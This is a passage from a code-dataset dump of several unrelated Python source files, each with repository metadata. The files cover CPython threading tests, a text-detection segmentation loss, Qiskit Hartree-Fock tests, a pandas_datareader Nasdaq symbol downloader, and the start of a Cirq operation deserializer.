        self.assertIn(' raise ValueError("bug")', stderr)
        self.assertIn('ValueError: bug', stderr)
    def test_system_exit(self):
        class ThreadExit(threading.Thread):
            def run(self):
                sys.exit(1)
        # threading.excepthook() silently ignores SystemExit
        with support.captured_output("stderr") as stderr:
            thread = ThreadExit()
            thread.start()
            thread.join()
        self.assertEqual(stderr.getvalue(), '')
    def test_custom_excepthook(self):
        # A user-installed hook receives the ExceptHookArgs namedtuple.
        args = None
        def hook(hook_args):
            nonlocal args
            args = hook_args
        try:
            with support.swap_attr(threading, 'excepthook', hook):
                thread = ThreadRunFail()
                thread.start()
                thread.join()
            self.assertEqual(args.exc_type, ValueError)
            self.assertEqual(str(args.exc_value), 'run failed')
            self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
            self.assertIs(args.thread, thread)
        finally:
            # Break reference cycle
            args = None
    def test_custom_excepthook_fail(self):
        # If the threading hook itself raises, the error is routed to
        # sys.excepthook and a short notice is written to stderr.
        def threading_hook(args):
            raise ValueError("threading_hook failed")
        err_str = None
        def sys_hook(exc_type, exc_value, exc_traceback):
            nonlocal err_str
            err_str = str(exc_value)
        with support.swap_attr(threading, 'excepthook', threading_hook), \
             support.swap_attr(sys, 'excepthook', sys_hook), \
             support.captured_output('stderr') as stderr:
            thread = ThreadRunFail()
            thread.start()
            thread.join()
        self.assertEqual(stderr.getvalue(),
                         'Exception in threading.excepthook:\n')
        self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
    """Tests for threading.Timer."""
    def setUp(self):
        BaseTestCase.setUp(self)
        # Each spy invocation appends (args, kwargs) and sets the event.
        self.callback_args = []
        self.callback_event = threading.Event()
    def test_init_immutable_default_args(self):
        # Issue 17435: constructor defaults were mutable objects, they could be
        # mutated via the object attributes and affect other Timer objects.
        timer1 = threading.Timer(0.01, self._callback_spy)
        timer1.start()
        self.callback_event.wait()
        # Mutate timer1's stored args/kwargs; timer2 must not be affected.
        timer1.args.append("blah")
        timer1.kwargs["foo"] = "bar"
        self.callback_event.clear()
        timer2 = threading.Timer(0.01, self._callback_spy)
        timer2.start()
        self.callback_event.wait()
        self.assertEqual(len(self.callback_args), 2)
        self.assertEqual(self.callback_args, [((), {}), ((), {})])
        timer1.join()
        timer2.join()
    def _callback_spy(self, *args, **kwargs):
        # Record copies so later mutation of the originals can't alias in.
        self.callback_args.append((args[:], kwargs.copy()))
        self.callback_event.set()
# Concrete instantiations of the generic lock_tests suites, each bound to
# the corresponding threading primitive under test.
class LockTests(lock_tests.LockTests):
    locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
    locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
    locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
    eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # Condition uses an RLock by default and exports its API.
    locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
    condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
    semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
    semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
    barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        # Verify threading.__all__ matches its public names; the deprecated
        # camelCase aliases are deliberately excluded via the blacklist.
        extra = {"ThreadError"}
        blacklist = {'currentThread', 'activeCount'}
        support.check__all__(self, threading, ('threading', '_thread'),
                             extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
    """_thread.interrupt_main() delivery semantics."""
    def test_interrupt_main_subthread(self):
        # Calling start_new_thread with a function that executes interrupt_main
        # should raise KeyboardInterrupt upon completion.
        def call_interrupt():
            _thread.interrupt_main()
        t = threading.Thread(target=call_interrupt)
        with self.assertRaises(KeyboardInterrupt):
            t.start()
            t.join()
        t.join()
    def test_interrupt_main_mainthread(self):
        # Make sure that if interrupt_main is called in main thread that
        # KeyboardInterrupt is raised instantly.
        with self.assertRaises(KeyboardInterrupt):
            _thread.interrupt_main()
    def test_interrupt_main_noerror(self):
        handler = signal.getsignal(signal.SIGINT)
        try:
            # No exception should arise.
            signal.signal(signal.SIGINT, signal.SIG_IGN)
            _thread.interrupt_main()
            signal.signal(signal.SIGINT, signal.SIG_DFL)
            _thread.interrupt_main()
        finally:
            # Restore original handler
            signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
    """threading._register_atexit: callbacks run once at interpreter shutdown."""
    def test_atexit_output(self):
        rc, out, err = assert_python_ok("-c", """if True:
            import threading
            def run_last():
                print('parrot')
            threading._register_atexit(run_last)
            """)
        self.assertFalse(err)
        self.assertEqual(out.strip(), b'parrot')
    def test_atexit_called_once(self):
        rc, out, err = assert_python_ok("-c", """if True:
            import threading
            from unittest.mock import Mock
            mock = Mock()
            threading._register_atexit(mock)
            mock.assert_not_called()
            # force early shutdown to ensure it was called once
            threading._shutdown()
            mock.assert_called_once()
            """)
        self.assertFalse(err)
    def test_atexit_after_shutdown(self):
        # The only way to do this is by registering an atexit within
        # an atexit, which is intended to raise an exception.
        rc, out, err = assert_python_ok("-c", """if True:
            import threading
            def func():
                pass
            def run_last():
                threading._register_atexit(func)
            threading._register_atexit(run_last)
            """)
        self.assertTrue(err)
        self.assertIn("RuntimeError: can't register atexit after shutdown",
                      err.decode())
# Allow running the test module directly: python test_threading.py
if __name__ == "__main__":
    unittest.main()
| 34.859504 | 88 | 0.567172 |
e59ee03887e39486e764c274913d28458eeb1d02 | 4,284 | py | Python | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 49 | 2021-07-28T03:21:35.000Z | 2022-03-31T13:19:32.000Z | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 4 | 2021-11-15T09:32:30.000Z | 2022-03-26T05:30:37.000Z | network/Seg_loss.py | robtu328/TextBPN | 225844770e0107817be9fb86d53f873fa3eb07ae | [
"MIT"
] | 5 | 2021-10-16T08:03:40.000Z | 2022-01-16T17:57:25.000Z | # -*- coding: utf-8 -*-
# @Time : 3/29/19 11:03 AM
# @Author : zhoujun
import torch
from torch import nn
import numpy as np
class SegmentLoss(nn.Module):
    def __init__(self, Lambda, ratio=3, reduction='mean'):
        """Implement PSE Loss.

        Args:
            Lambda: weight of the text-region loss; the kernel loss gets
                (1 - Lambda).
            ratio: negative:positive sampling ratio for OHEM.
                NOTE(review): ohem_single hard-codes ``pos_num * 3`` rather
                than using this attribute — confirm whether intended.
            reduction: 'mean' or 'sum' reduction over the batch.
        """
        super(SegmentLoss, self).__init__()
        assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
        self.Lambda = Lambda
        self.ratio = ratio
        self.reduction = reduction
    def forward(self, outputs, labels, training_masks, th=0.5):
        """Compute (text loss, kernel loss, combined loss).

        outputs/labels are assumed (batch, channels, H, W) with the last
        channel being the full-text map and the rest the shrunk kernels
        (indexing at [:, -1] / [:, :-1] relies on this layout).
        """
        texts = outputs[:, -1, :, :]
        kernels = outputs[:, :-1, :, :]
        gt_texts = labels[:, -1, :, :]
        gt_kernels = labels[:, :-1, :, :]
        # Hard-example mining selects which pixels contribute to the text loss.
        selected_masks = self.ohem_batch(texts, gt_texts, training_masks)
        selected_masks = selected_masks.to(outputs.device)
        loss_text = self.dice_loss(texts, gt_texts, selected_masks)
        loss_kernels = []
        # mask0 = torch.sigmoid(texts).data.cpu().numpy()
        mask0 = texts.data.cpu().numpy()
        mask1 = training_masks.data.cpu().numpy()
        # Kernel losses only count pixels confidently predicted as text
        # and not excluded by the training mask.
        selected_masks = ((mask0 > th) & (mask1 > th)).astype('float32')
        selected_masks = torch.from_numpy(selected_masks).float()
        selected_masks = selected_masks.to(outputs.device)
        kernels_num = gt_kernels.size()[1]
        for i in range(kernels_num):
            kernel_i = kernels[:, i, :, :]
            gt_kernel_i = gt_kernels[:, i, :, :]
            loss_kernel_i = self.dice_loss(kernel_i, gt_kernel_i, selected_masks)
            loss_kernels.append(loss_kernel_i)
        loss_kernels = torch.stack(loss_kernels).mean(0)
        if self.reduction == 'mean':
            loss_text = loss_text.mean()
            loss_kernels = loss_kernels.mean()
        elif self.reduction == 'sum':
            loss_text = loss_text.sum()
            loss_kernels = loss_kernels.sum()
        loss = self.Lambda *loss_text + (1-self.Lambda)*loss_kernels
        return loss_text, loss_kernels, loss
    def dice_loss(self, input, target, mask):
        """Per-sample soft dice loss (1 - dice coefficient), masked."""
        # input = torch.sigmoid(input)
        input = input.contiguous().view(input.size()[0], -1)
        target = target.contiguous().view(target.size()[0], -1)
        mask = mask.contiguous().view(mask.size()[0], -1)
        input = input * mask
        target = (target.float()) * mask
        a = torch.sum(input * target, 1)
        # 0.001 smoothing avoids division by zero for empty masks.
        b = torch.sum(input * input, 1) + 0.001
        c = torch.sum(target * target, 1) + 0.001
        d = (2 * a) / (b + c)
        return 1 - d
    def ohem_single(self, score, gt_text, training_mask, th=0.5):
        """OHEM for one sample: keep all positives plus the hardest negatives
        (up to 3x the positive count), returned as a (1, H, W) float mask."""
        pos_num = (int)(np.sum(gt_text > th)) - (int)(np.sum((gt_text > th) & (training_mask <= th)))
        if pos_num == 0:
            # selected_mask = gt_text.copy() * 0 # may be not good
            selected_mask = training_mask
            selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
            return selected_mask
        neg_num = (int)(np.sum(gt_text <= th))
        neg_num = (int)(min(pos_num * 3, neg_num))
        if neg_num == 0:
            selected_mask = training_mask
            selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
            return selected_mask
        neg_score = score[gt_text <= th]
        # Sort negative-sample scores from high to low.
        neg_score_sorted = np.sort(-neg_score)
        threshold = -neg_score_sorted[neg_num - 1]
        # Select the mask of high-scoring negatives plus all positives.
        selected_mask = ((score >= threshold) | (gt_text > th)) & (training_mask > th)
        selected_mask = selected_mask.reshape(1, selected_mask.shape[0], selected_mask.shape[1]).astype('float32')
        return selected_mask
    def ohem_batch(self, scores, gt_texts, training_masks):
        """Apply ohem_single per batch element; returns a float CPU tensor."""
        scores = scores.data.cpu().numpy()
        gt_texts = gt_texts.data.cpu().numpy()
        training_masks = training_masks.data.cpu().numpy()
        selected_masks = []
        for i in range(scores.shape[0]):
            selected_masks.append(self.ohem_single(scores[i, :, :], gt_texts[i, :, :], training_masks[i, :, :]))
        selected_masks = np.concatenate(selected_masks, 0)
        selected_masks = torch.from_numpy(selected_masks).float()
        return selected_masks
| 39.666667 | 118 | 0.599907 |
5120104319ce0101675f0d0befdd86b523b53ebc | 475 | py | Python | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | 2 | 2021-01-18T15:39:57.000Z | 2021-01-19T01:57:27.000Z | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | null | null | null | starter_app/apps.py | reorx/django_starter_pack | 5931c880d6b51159d20a060e72869d9d009091bb | [
"MIT"
] | 2 | 2021-01-18T11:21:05.000Z | 2021-01-18T12:38:55.000Z | from django.apps import AppConfig as BaseAppConfig
from importlib import import_module
SUBAPPS = [
'contact',
]
class AppConfig(BaseAppConfig):
    """App config that registers models from each sub-app listed in SUBAPPS."""
    name = 'starter_app'
    # WARN not compatible for django < 1.11
    def import_models(self):
        # Called by Django during app loading; imports every sub-app's
        # models module so their models get registered.
        self.models = self.apps.all_models[self.label]
        models_module = None
        for i in SUBAPPS:
            models_module = import_module(f'{self.name}.{i}.models')
        # NOTE(review): only the LAST sub-app's module is kept as
        # self.models_module — confirm this is intended when SUBAPPS grows.
        self.models_module = models_module
| 21.590909 | 68 | 0.673684 |
7a92930b85a4d3e6434fa45ba1f0ef0f0c294060 | 304 | py | Python | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | null | null | null | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | null | null | null | cenv_tool/__init__.py | oozut/cenv_tool | a02977dc80a54c0045785ad97284fde0b9248aff | [
"MIT"
] | 1 | 2020-10-01T22:08:17.000Z | 2020-10-01T22:08:17.000Z | # -*- coding: utf-8 -*-
"""Conda environment creation and update from meta.yaml."""
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
# Resolve the installed package version from setuptools metadata; fall back
# to an empty string when the distribution is not installed (e.g. running
# from a plain source checkout).
try:
    __version__ = get_distribution('cenv_tool').version
except (AttributeError, DistributionNotFound):
    __version__ = ''
| 30.4 | 59 | 0.769737 |
055b634466c000255c418911e42392957f2433a4 | 4,844 | py | Python | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | test/chemistry/test_initial_state_hartree_fock.py | gabrieleagl/qiskit-aqua | 521d505a6483985c039dcfb71f7d517471cff441 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Initial State HartreeFock """
import unittest
from test.chemistry import QiskitChemistryTestCase
import numpy as np
from ddt import ddt, idata, unpack
from qiskit.chemistry.components.initial_states import HartreeFock
from qiskit.aqua.operators.legacy import op_converter
from qiskit.chemistry import QiskitChemistryError
from qiskit.chemistry.drivers import PySCFDriver, UnitsType
from qiskit.chemistry.core import Hamiltonian, TransformationType, QubitMappingType
@ddt
class TestInitialStateHartreeFock(QiskitChemistryTestCase):
    """ Initial State HartreeFock tests """
    # Each test builds a HartreeFock initial state for a given qubit mapping
    # and checks the resulting statevector / circuit against known values.
    def test_qubits_4_jw_h2(self):
        """ qubits 4 jw h2 test """
        hrfo = HartreeFock(4, [1, 1], 'jordan_wigner', False)
        cct = hrfo.construct_circuit('vector')
        np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0,
                                            0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
    def test_qubits_4_py_h2(self):
        """ qubits 4 py h2 test """
        hrfo = HartreeFock(4, [1, 1], 'parity', False)
        cct = hrfo.construct_circuit('vector')
        np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0,
                                            0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
    def test_qubits_4_bk_h2(self):
        """ qubits 4 bk h2 test """
        hrfo = HartreeFock(4, [1, 1], 'bravyi_kitaev', False)
        cct = hrfo.construct_circuit('vector')
        np.testing.assert_array_equal(cct, [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
                                            0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
    def test_qubits_2_py_h2(self):
        """ qubits 2 py h2 test """
        # two_qubit_reduction=True halves the register for the parity mapping
        hrfo = HartreeFock(4, 2, 'parity', True)
        cct = hrfo.construct_circuit('vector')
        np.testing.assert_array_equal(cct, [0.0, 1.0, 0.0, 0.0])
    def test_qubits_2_py_h2_cct(self):
        """ qubits 2 py h2 cct test """
        hrfo = HartreeFock(4, [1, 1], 'parity', True)
        cct = hrfo.construct_circuit('circuit')
        self.assertEqual(cct.qasm(), 'OPENQASM 2.0;\ninclude "qelib1.inc";\nqreg q[2];\n'
                                     'x q[0];\n')
    def test_qubits_6_py_lih_cct(self):
        """ qubits 6 py lih cct test """
        hrfo = HartreeFock(10, [1, 1], 'parity', True, [1, 2])
        cct = hrfo.construct_circuit('circuit')
        self.assertEqual(cct.qasm(), 'OPENQASM 2.0;\ninclude "qelib1.inc";\nqreg q[6];\n'
                                     'x q[0];\n'
                                     'x q[1];\n')
    def test_qubits_10_bk_lih_bitstr(self):
        """ qubits 10 bk lih bitstr test """
        hrfo = HartreeFock(10, [1, 1], 'bravyi_kitaev', False)
        bitstr = hrfo.bitstr
        np.testing.assert_array_equal(bitstr,
                                      [False, False, False, False, True,
                                       False, True, False, True, True])
    @idata([
        [QubitMappingType.JORDAN_WIGNER],
        [QubitMappingType.PARITY],
        [QubitMappingType.BRAVYI_KITAEV]
    ])
    @unpack
    def test_hf_value(self, mapping):
        """ hf value test """
        # End-to-end: the HF state's expectation value of the qubit
        # Hamiltonian must reproduce the driver's reference HF energy.
        try:
            driver = PySCFDriver(atom='Li .0 .0 .0; H .0 .0 1.6',
                                 unit=UnitsType.ANGSTROM,
                                 charge=0,
                                 spin=0,
                                 basis='sto3g')
        except QiskitChemistryError:
            self.skipTest('PYSCF driver does not appear to be installed')
        qmolecule = driver.run()
        core = Hamiltonian(transformation=TransformationType.FULL,
                           qubit_mapping=mapping,
                           two_qubit_reduction=False,
                           freeze_core=False,
                           orbital_reduction=[])
        qubit_op, _ = core.run(qmolecule)
        qubit_op = op_converter.to_matrix_operator(qubit_op)
        hrfo = HartreeFock(core.molecule_info['num_orbitals'],
                           core.molecule_info['num_particles'], mapping.value, False)
        qc = hrfo.construct_circuit('vector')
        hf_energy = qubit_op.evaluate_with_statevector(qc)[0].real + core._nuclear_repulsion_energy
        self.assertAlmostEqual(qmolecule.hf_energy, hf_energy, places=8)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 42.121739 | 99 | 0.580306 |
2dd20a8587668eca0a17b41cfb45026806714749 | 3,437 | py | Python | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | 1 | 2018-01-11T14:11:40.000Z | 2018-01-11T14:11:40.000Z | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | null | null | null | Finance/Python/finance/lib/python2.7/site-packages/pandas_datareader/nasdaq_trader.py | pallavbakshi/datascience | 10f2bb2c16e6fd593e6bee437aa36098596eec25 | [
"MIT"
] | 5 | 2018-05-19T05:08:51.000Z | 2021-04-29T16:03:45.000Z | from ftplib import FTP, all_errors
from pandas import read_csv
from pandas_datareader._utils import RemoteDataError
from pandas.compat import StringIO
import time
import warnings
_NASDAQ_TICKER_LOC = '/SymbolDirectory/nasdaqtraded.txt'
_NASDAQ_FTP_SERVER = 'ftp.nasdaqtrader.com'
_TICKER_DTYPE = [('Nasdaq Traded', bool),
('Symbol', str),
('Security Name', str),
('Listing Exchange', str),
('Market Category', str),
('ETF', bool),
('Round Lot Size', float),
('Test Issue', bool),
('Financial Status', str),
('CQS Symbol', str),
('NASDAQ Symbol', str),
('NextShares', bool)]
_CATEGORICAL = ('Listing Exchange', 'Financial Status')
_DELIMITER = '|'
_ticker_cache = None
def _bool_converter(item):
return item == 'Y'
def _download_nasdaq_symbols(timeout):
    """Download and parse the Nasdaq-traded symbol directory over FTP.

    Parameters
    ----------
    timeout : int
        The time (seconds) to wait for the FTP connection.

    Returns
    -------
    pandas.DataFrame
        One row per symbol, indexed by the 'Symbol' column, with Y/N flag
        columns converted to booleans and enumeration columns categorical.

    Raises
    ------
    RemoteDataError
        On connection failure, download failure, or a malformed listing.
    """
    try:
        ftp_session = FTP(_NASDAQ_FTP_SERVER, timeout=timeout)
        ftp_session.login()
    except all_errors as err:
        # BUG FIX: the format string previously read '%r: $s' ('$' instead of
        # '%'), so applying the two-element tuple raised a TypeError and the
        # intended RemoteDataError was never produced.
        raise RemoteDataError('Error connecting to %r: %s' %
                              (_NASDAQ_FTP_SERVER, err))
    lines = []
    try:
        ftp_session.retrlines('RETR ' + _NASDAQ_TICKER_LOC, lines.append)
    except all_errors as err:
        raise RemoteDataError('Error downloading from %r: %s' %
                              (_NASDAQ_FTP_SERVER, err))
    finally:
        ftp_session.close()
    # Sanity Checking: the listing must end with the expected footer.
    # Guard against an empty response before indexing lines[-1].
    if not lines or not lines[-1].startswith('File Creation Time:'):
        found = lines[-1] if lines else '<empty response>'
        raise RemoteDataError('Missing expected footer. Found %r' % found)
    # Convert Y/N to True/False for every column declared bool in the schema.
    converter_map = {col: _bool_converter for col, t in _TICKER_DTYPE
                     if t is bool}
    # For pandas >= 0.20.0, the Python parser issues a warning if
    # both a converter and dtype are specified for the same column.
    # However, this measure is probably temporary until the read_csv
    # behavior is better formalized.
    with warnings.catch_warnings(record=True):
        data = read_csv(StringIO('\n'.join(lines[:-1])), '|',
                        dtype=_TICKER_DTYPE, converters=converter_map,
                        index_col=1)
    # Properly cast enumerations
    for cat in _CATEGORICAL:
        data[cat] = data[cat].astype('category')
    return data
def get_nasdaq_symbols(retry_count=3, timeout=30, pause=None):
    """
    Get the list of all available equity symbols from Nasdaq.

    The result is cached at module level, so only the first successful call
    hits the network.

    Parameters
    ----------
    retry_count : int, default 3
        Number of download attempts before giving up.
    timeout : int, default 30
        FTP connection timeout in seconds; must be >= 0.
    pause : float, optional
        Seconds to sleep between retries; must be >= 0. Defaults to
        ``timeout / 3``.

    Returns
    -------
    nasdaq_tickers : pandas.DataFrame
        DataFrame with company tickers, names, and other properties.

    Raises
    ------
    ValueError
        If ``timeout`` or ``pause`` is negative.
    RemoteDataError
        If the download still fails after ``retry_count`` attempts.
    """
    global _ticker_cache
    if timeout < 0:
        raise ValueError('timeout must be >= 0, not %r' % (timeout,))
    if pause is None:
        pause = timeout / 3
    elif pause < 0:
        raise ValueError('pause must be >= 0, not %r' % (pause,))
    if _ticker_cache is None:
        while retry_count > 0:
            try:
                _ticker_cache = _download_nasdaq_symbols(timeout=timeout)
                break
            except RemoteDataError:
                # BUG FIX: previously the `raise` branch was unreachable
                # (retry_count was still > 0 when tested), so exhausting all
                # retries silently returned None. Now the final failure
                # propagates to the caller.
                retry_count -= 1
                if retry_count <= 0:
                    raise
                time.sleep(pause)
    return _ticker_cache
| 31.245455 | 78 | 0.586849 |
6ed77a59d96ded565b7124aa205d4c4b0dc94dcb | 12,590 | py | Python | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/serialization/op_deserializer.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Sequence,
)
from dataclasses import dataclass
import abc
import sympy
import cirq
from cirq_google.api import v2
from cirq_google.ops.calibration_tag import CalibrationTag
from cirq_google.serialization import arg_func_langs
class OpDeserializer(abc.ABC):
    """Generic supertype for operation deserializers.
    Each operation deserializer describes how to deserialize operation protos
    with a particular `serialized_id` to a specific type of Cirq operation.
    """
    @property
    @abc.abstractmethod
    def serialized_id(self) -> str:
        """Returns the string identifier for the accepted serialized objects.
        This ID denotes the serialization format this deserializer consumes. For
        example, one of the common deserializers converts objects with the id
        'xy' into PhasedXPowGates.
        """
    @abc.abstractmethod
    def from_proto(
        self,
        proto,
        *,
        arg_function_language: str = '',
        constants: Optional[List[v2.program_pb2.Constant]] = None,
        deserialized_constants: Optional[List[Any]] = None,
    ) -> cirq.Operation:
        """Converts a proto-formatted operation into a Cirq operation.
        Args:
            proto: The proto object to be deserialized.
            arg_function_language: The `arg_function_language` field from
                `Program.Language`.
            constants: The list of Constant protos referenced by constant
                table indices in `proto`.
            deserialized_constants: The deserialized contents of `constants`.
        Returns:
            The deserialized operation represented by `proto`.
        """
@dataclass(frozen=True)
class DeserializingArg:
    """Specification of the arguments to deserialize an argument to a gate.
    Args:
        serialized_name: The serialized name of the gate that is being
            deserialized.
        constructor_arg_name: The name of the argument in the constructor of
            the gate corresponding to this serialized argument.
        value_func: Sometimes a value from the serialized proto needs to
            converted to an appropriate type or form. This function takes the
            serialized value and returns the appropriate type. Defaults to
            None.
        required: Whether a value must be specified when constructing the
            deserialized gate. Defaults to True.
        default: default value to set if the value is not present in the
            arg. If set, required is ignored.
    """
    serialized_name: str
    constructor_arg_name: str
    # Optional post-processing applied to the decoded proto value.
    value_func: Optional[Callable[[arg_func_langs.ARG_LIKE], Any]] = None
    required: bool = True
    # When truthy, used as the fallback value and `required` is ignored.
    default: Any = None
class GateOpDeserializer(OpDeserializer):
    """Describes how to deserialize a proto to a given Gate type.

    Attributes:
        serialized_gate_id: The id used when serializing the gate.
    """

    def __init__(
        self,
        serialized_gate_id: str,
        gate_constructor: Callable,
        args: Sequence[DeserializingArg],
        num_qubits_param: Optional[str] = None,
        op_wrapper: Callable[
            [cirq.Operation, v2.program_pb2.Operation], cirq.Operation
        ] = lambda x, y: x,
        deserialize_tokens: Optional[bool] = True,
    ):
        """Constructs a deserializer.

        Args:
            serialized_gate_id: The serialized id of the gate that is being
                deserialized.
            gate_constructor: A function that produces the deserialized gate
                given arguments from args.
            args: A list of the arguments to be read from the serialized
                gate and the information required to use this to construct
                the gate using the gate_constructor above.
            num_qubits_param: Some gate constructors require that the number
                of qubits be passed to their constructor. This is the name
                of the parameter in the constructor for this value. If None,
                no number of qubits is passed to the constructor.
            op_wrapper: An optional Callable to modify the resulting
                GateOperation, for instance, to add tags
            deserialize_tokens: Whether to convert tokens to
                CalibrationTags. Defaults to True.
        """
        self._serialized_gate_id = serialized_gate_id
        self._gate_constructor = gate_constructor
        self._args = args
        self._num_qubits_param = num_qubits_param
        self._op_wrapper = op_wrapper
        self._deserialize_tokens = deserialize_tokens

    @property
    def serialized_id(self):
        # Id this deserializer responds to in a serialized circuit.
        return self._serialized_gate_id

    # TODO(#3388) Add documentation for Raises.
    # pylint: disable=missing-raises-doc
    def from_proto(
        self,
        proto: v2.program_pb2.Operation,
        *,
        arg_function_language: str = '',
        constants: Optional[List[v2.program_pb2.Constant]] = None,
        deserialized_constants: Optional[List[Any]] = None,  # unused
    ) -> cirq.Operation:
        """Turns a cirq_google.api.v2.Operation proto into a GateOperation.

        Args:
            proto: The proto object to be deserialized.
            arg_function_language: The `arg_function_language` field from
                `Program.Language`.
            constants: The list of Constant protos referenced by constant
                table indices in `proto`.
            deserialized_constants: Unused in this method.

        Returns:
            The deserialized GateOperation represented by `proto`.
        """
        qubits = [v2.qubit_from_proto_id(q.id) for q in proto.qubits]
        args = self._args_from_proto(proto, arg_function_language=arg_function_language)
        if self._num_qubits_param is not None:
            args[self._num_qubits_param] = len(qubits)
        gate = self._gate_constructor(**args)
        op = self._op_wrapper(gate.on(*qubits), proto)
        if self._deserialize_tokens:
            # A token is stored either inline ('token_value') or as an index
            # into the program's constant table ('token_constant_index').
            which = proto.WhichOneof('token')
            if which == 'token_constant_index':
                if not constants:
                    raise ValueError(
                        'Proto has references to constants table '
                        'but none was passed in, value ='
                        f'{proto}'
                    )
                op = op.with_tags(
                    CalibrationTag(constants[proto.token_constant_index].string_value)
                )
            elif which == 'token_value':
                op = op.with_tags(CalibrationTag(proto.token_value))
        return op

    # pylint: enable=missing-raises-doc
    def _args_from_proto(
        self, proto: v2.program_pb2.Operation, *, arg_function_language: str
    ) -> Dict[str, arg_func_langs.ARG_LIKE]:
        """Extracts the constructor kwargs described by `self._args` from `proto`."""
        return_args = {}
        for arg in self._args:
            if arg.serialized_name not in proto.args:
                # Compare against None (not truthiness) so that falsy defaults
                # such as 0, 0.0, False or '' are still honoured. Per the
                # DeserializingArg docstring, `required` is ignored whenever a
                # default is set.
                if arg.default is not None:
                    return_args[arg.constructor_arg_name] = arg.default
                    continue
                elif arg.required:
                    raise ValueError(
                        f'Argument {arg.serialized_name} '
                        'not in deserializing args, but is required.'
                    )
            value = arg_func_langs.arg_from_proto(
                proto.args[arg.serialized_name],
                arg_function_language=arg_function_language,
                required_arg_name=None if not arg.required else arg.serialized_name,
            )
            if arg.value_func is not None:
                value = arg.value_func(value)
            # None means "argument absent"; let the constructor use its own default.
            if value is not None:
                return_args[arg.constructor_arg_name] = value
        return return_args
class CircuitOpDeserializer(OpDeserializer):
    """Describes how to deserialize CircuitOperation protos."""
    @property
    def serialized_id(self):
        # All CircuitOperations share the fixed id 'circuit'.
        return 'circuit'
    # TODO(#3388) Add documentation for Raises.
    # pylint: disable=missing-raises-doc
    def from_proto(
        self,
